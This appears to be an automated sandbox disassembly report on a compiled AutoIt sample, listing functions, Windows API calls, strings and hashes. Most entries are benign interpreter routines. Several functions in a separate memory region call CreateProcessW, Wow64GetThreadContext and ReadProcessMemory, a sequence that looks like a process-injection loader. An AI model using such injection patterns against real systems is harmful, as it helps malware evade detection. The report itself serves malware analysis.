Function 00B9D730 Relevance: 21.6, APIs: 14, Instructions: 616windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00B9D807
timeGetTime.WINMM ref: 00B9DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B9DB28
TranslateMessage.USER32(?), ref: 00B9DB7B
DispatchMessageW.USER32(?), ref: 00B9DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B9DB9F
Sleep.KERNEL32(0000000A), ref: 00B9DBB1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 3daffa242e4d5407da038de61a4854086b32349cedbed1d8b9af007e171b2585
Instruction ID: 3988191c9ff279a6650c28c11b67fd8fbf9e97e3a298535a26d305b015a68137
Opcode Fuzzy Hash: 3daffa242e4d5407da038de61a4854086b32349cedbed1d8b9af007e171b2585
Instruction Fuzzy Hash: 0442D030608681EFDB34DF26C884BAAB7E5FF45314F188ABDE55687291D770E844CB92

Function 00B92CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B92D07
RegisterClassExW.USER32(00000030), ref: 00B92D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B92D42
InitCommonControlsEx.COMCTL32(?), ref: 00B92D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B92D6F
LoadIconW.USER32(000000A9), ref: 00B92D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B92D94

Strings

TaskbarCreated, xrefs: 00B92D37
+, xrefs: 00B92CF0
AutoIt v3 GUI, xrefs: 00B92D23
0, xrefs: 00B92CE9

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 7ebe64bc972b9345dd7f5c54e15703ade486a8a2935a6f90b16f4bee6af099fe
Instruction ID: de0d987367c6ce6140541692d61a3bb43ab611b700fe77d0cf96303304772037
Opcode Fuzzy Hash: 7ebe64bc972b9345dd7f5c54e15703ade486a8a2935a6f90b16f4bee6af099fe
Instruction Fuzzy Hash: 7C21C3B5911218AFDB20DFA5E889BDDBBB4FB08702F08411AF911A66A0D7B14545CF91

Function 00BD065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BD039A: CreateFileW.KERNELBASE(00000000,00000000,?,00BD0704,?,?,00000000,?,00BD0704,00000000,0000000C), ref: 00BD03B7

GetLastError.KERNEL32 ref: 00BD076F
__dosmaperr.LIBCMT ref: 00BD0776
GetFileType.KERNELBASE(00000000), ref: 00BD0782
GetLastError.KERNEL32 ref: 00BD078C
__dosmaperr.LIBCMT ref: 00BD0795
CloseHandle.KERNEL32(00000000), ref: 00BD07B5
CloseHandle.KERNEL32(?), ref: 00BD08FF
GetLastError.KERNEL32 ref: 00BD0931
__dosmaperr.LIBCMT ref: 00BD0938

Strings

H, xrefs: 00BD08BD

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 3d09287cb6feef3936fae8bb94e97aec91b3d924b4cbb3fc6e4f184bf9d864b8
Instruction ID: 078def0a972927879128a5505c80cee9fc88cf00354ce546b577b25122cb332a
Opcode Fuzzy Hash: 3d09287cb6feef3936fae8bb94e97aec91b3d924b4cbb3fc6e4f184bf9d864b8
Instruction Fuzzy Hash: 25A106329141059FDF29EF68D891BAEBBE0EB46320F14019AF815AF391E7719C13CB91

Function 00B9344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B93A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C61418,?,00B92E7F,?,?,?,00000000), ref: 00B93A78

Part of subcall function 00B93357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B93379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B9356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BD318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BD31CE
RegCloseKey.ADVAPI32(?), ref: 00BD3210
_wcslen.LIBCMT ref: 00BD3277
_wcslen.LIBCMT ref: 00BD3286

Strings

\Include\, xrefs: 00B93527
Software\AutoIt v3\AutoIt, xrefs: 00B93560
Include, xrefs: 00BD3184, 00BD31C5
\, xrefs: 00BD328C

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: fb193e831fd74c45fc3c02e95890d938d454e9842ea1cef68c7be4190e09df8d
Instruction ID: 1313adcd1ff82e98a7adb2029601b4244aaa76065b6cf90c4a3cb3a04a80ee8e
Opcode Fuzzy Hash: fb193e831fd74c45fc3c02e95890d938d454e9842ea1cef68c7be4190e09df8d
Instruction Fuzzy Hash: 57715D715047019EC724EF66DC81AAFBBE8FF95740B40087EF545932B1EBB09A49CB52

Function 00B92B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B92B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00B92B9D
LoadIconW.USER32(00000063), ref: 00B92BB3
LoadIconW.USER32(000000A4), ref: 00B92BC5
LoadIconW.USER32(000000A2), ref: 00B92BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B92BEF
RegisterClassExW.USER32(?), ref: 00B92C40

Part of subcall function 00B92CD4: GetSysColorBrush.USER32(0000000F), ref: 00B92D07
Part of subcall function 00B92CD4: RegisterClassExW.USER32(00000030), ref: 00B92D31
Part of subcall function 00B92CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B92D42
Part of subcall function 00B92CD4: InitCommonControlsEx.COMCTL32(?), ref: 00B92D5F
Part of subcall function 00B92CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B92D6F
Part of subcall function 00B92CD4: LoadIconW.USER32(000000A9), ref: 00B92D85
Part of subcall function 00B92CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B92D94

Strings

AutoIt v3, xrefs: 00B92C2F
0, xrefs: 00B92C0F
#, xrefs: 00B92C16

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 81cad0378b4b496da31352ba1c8271f67349279067c8a795d12309c6c750bb3f
Instruction ID: 8b826056f9cdc966add8587dfb5ea2e70e2b1dfd6ec44025f32f60fef1b83a5b
Opcode Fuzzy Hash: 81cad0378b4b496da31352ba1c8271f67349279067c8a795d12309c6c750bb3f
Instruction Fuzzy Hash: B2210971E10314ABDB209FA6EC95BAD7FB4FB48B51F08006AEA01A67B0D7F14541DF90

Function 00B93170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B9316A,?,?), ref: 00B931D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00B9316A,?,?), ref: 00B93204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B93227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B9316A,?,?), ref: 00B93232
CreatePopupMenu.USER32 ref: 00B93246
PostQuitMessage.USER32(00000000), ref: 00B93267

Strings

TaskbarCreated, xrefs: 00B9322D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4a7df6ab1fd6591ab26d39007163628c81e3469c9a6f2420ee04389fd8e0c780
Instruction ID: fa3c2193aa01566f8248e2d5c46eed42937acb0fbc25a9b902ee43aa649ec4fd
Opcode Fuzzy Hash: 4a7df6ab1fd6591ab26d39007163628c81e3469c9a6f2420ee04389fd8e0c780
Instruction Fuzzy Hash: B6414431214204ABDF342B789D8DB7D3ADAEB05B41F0C41B6F912D62B1DBB18A41E7A1

Function 00BC8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06470cb974ed996c7d3d523afd45a822a139d20158b74219f264c8a07789238b
Instruction ID: 3a1cc1804ed215231c3be30e582331377ada46ef6a05d839763a7b2941e69001
Opcode Fuzzy Hash: 06470cb974ed996c7d3d523afd45a822a139d20158b74219f264c8a07789238b
Instruction Fuzzy Hash: D5C19D75A04249AFEB21DFA8D885FEDBBF0AF09310F1441DDF915A7292C7B09942CB61

Function 033425B0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03342681
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 033428A7

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
Instruction ID: 92d1f4b789e131e4a58be06d3ae7153176f9f51416d311d4e236678147c51c89
Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
Instruction Fuzzy Hash: 7CA10774E00209EBDB14CFA4C994BEEBBB5FF48305F248599E501BB281D775AA80CF94

Function 00B92C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B92C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B92CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B91CAD,?), ref: 00B92CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B91CAD,?), ref: 00B92CCF

Strings

AutoIt v3, xrefs: 00B92C89, 00B92C8E, 00B92C8F
edit, xrefs: 00B92CAC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: c94a84a39daa5b4d2ae992adf8ee228ee4bd3630da02826f7b9b775fde629f2b
Instruction ID: a614b59b80c66477c85ff385bd38c4ac132c2df10aea1caa8bfde86f4cd2a4bf
Opcode Fuzzy Hash: c94a84a39daa5b4d2ae992adf8ee228ee4bd3630da02826f7b9b775fde629f2b
Instruction Fuzzy Hash: 5CF0DA755502907AEB711B17AC48F7F2EBDD7CAF51B08006AFD01A26B0C6B15851EAB1

Function 033423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 033422A0: Sleep.KERNELBASE(000001F4), ref: 033422B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0334249C

Strings

76D82LJIGDYXED, xrefs: 033424FF, 03342502

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID: CreateFileSleep
String ID: 76D82LJIGDYXED
API String ID: 2694422964-3013937850
Opcode ID: 33998783c3f2f9ea9a4fefd1f4d5f25a98a5ad5ae31ad2a5775f8b9fb3d56be9
Instruction ID: 7c00f134e28320b7b9c1654449a509740b4fbc9a52f92f0863c2a82e7faecee4
Opcode Fuzzy Hash: 33998783c3f2f9ea9a4fefd1f4d5f25a98a5ad5ae31ad2a5775f8b9fb3d56be9
Instruction Fuzzy Hash: 84515D71D04259EAEF11DBA4C854BEFBBB8AF05300F004599E608BB2C0D7791B85CBA5

Function 00C02947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C02C05
DeleteFileW.KERNEL32(?), ref: 00C02C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C02C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C02CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C02CC0

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 0e4969ee4bbaa78b1ac35c962f9acdc22f630dab4dea58116317d88256957db7
Instruction ID: 79b736b5f7a6f3b6814cd89a5ba9fcc317f3c01c01bad92f2e81b93930e5c763
Opcode Fuzzy Hash: 0e4969ee4bbaa78b1ac35c962f9acdc22f630dab4dea58116317d88256957db7
Instruction Fuzzy Hash: DEB12F71E00119ABDF21DBA4CC89EEEB7BDEF49350F1040A6F909E6191EB709A44DF61

Function 00B93B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B93B0F,SwapMouseButtons,00000004,?), ref: 00B93B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B93B0F,SwapMouseButtons,00000004,?), ref: 00B93B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B93B0F,SwapMouseButtons,00000004,?), ref: 00B93B83

Strings

Control Panel\Mouse, xrefs: 00B93B3E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 8d8053a21714bad78be2ba1bb849f0323125015a1e226bc260b3c026601fd1d9
Instruction ID: 1e41cbde5e926b938d9a843260759a0ba463db13e66b0f8965a59dbd66c01ae6
Opcode Fuzzy Hash: 8d8053a21714bad78be2ba1bb849f0323125015a1e226bc260b3c026601fd1d9
Instruction Fuzzy Hash: 92112AB5520208FFDF208FA5DC84EAEB7F8EF04B44B1044A9A805D7210D2719E4197A0

Function 033412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03341A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03341AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03341B13

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
Instruction ID: fdd2c1028ac156363953abdfc59e8b397d3c9e1483fe1d2e4d802b0b7419a3c3
Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
Instruction Fuzzy Hash: 4A62FB34E146589BEB24CFA4CC90BDEB376EF58300F1091A9D10DEB2A4E7759E81CB59

Function 00B9DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00BE32B7

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 1f7fe8818731f7142562d0a6def755a37685b7e9d45f2d654805b6a836d1a0b0
Instruction ID: 4b0613c33a705d385eda9fa321c19485c89d9b9cb7a6219c4ecaff1d665e0977
Opcode Fuzzy Hash: 1f7fe8818731f7142562d0a6def755a37685b7e9d45f2d654805b6a836d1a0b0
Instruction Fuzzy Hash: 8AC26870A04215CFCF24CF98C885AADB7F1FB19700F2485A9E966AB3A1D375ED41CB91

Function 00B93923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BD33A2

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B93A04

Strings

Line: , xrefs: 00BD33EB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 8fb99382b37b7ed1b95fbfeeea6c894bfa26b9fc924daa327e6603df007eed25
Instruction ID: a71346f76c7f81c1207ed4f4a792a8ea25d4377ed288db4457993795de508bd2
Opcode Fuzzy Hash: 8fb99382b37b7ed1b95fbfeeea6c894bfa26b9fc924daa327e6603df007eed25
Instruction Fuzzy Hash: 3C31B671408304AFCB25EB14DC45BEFB7D8AB44B50F0845BEF99A931A1EBB09649C7C6

Function 00BAFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00BB0668

Part of subcall function 00BB32A4: RaiseException.KERNEL32(?,?,?,00BB068A,?,00C61444,?,?,?,?,?,?,00BB068A,00B91129,00C58738,00B91129), ref: 00BB3304

__CxxThrowException@8.LIBVCRUNTIME ref: 00BB0685

Strings

Unknown exception, xrefs: 00BB0692

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: aa704c99384d7590da8796cb16c94c8986fbd9202f901ba44ca78d753998b883
Instruction ID: 58be5308451fe24ece9b95d0733573b5f8a4997e663c088240a1de4d4ec77182
Opcode Fuzzy Hash: aa704c99384d7590da8796cb16c94c8986fbd9202f901ba44ca78d753998b883
Instruction Fuzzy Hash: CCF0C23490020DB78F14BAA4D886CFF77EC9E00750B6041F1B924969A2EFF1EA69C690

Function 00C03017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C0302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C03044

Strings

aut, xrefs: 00C03038

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
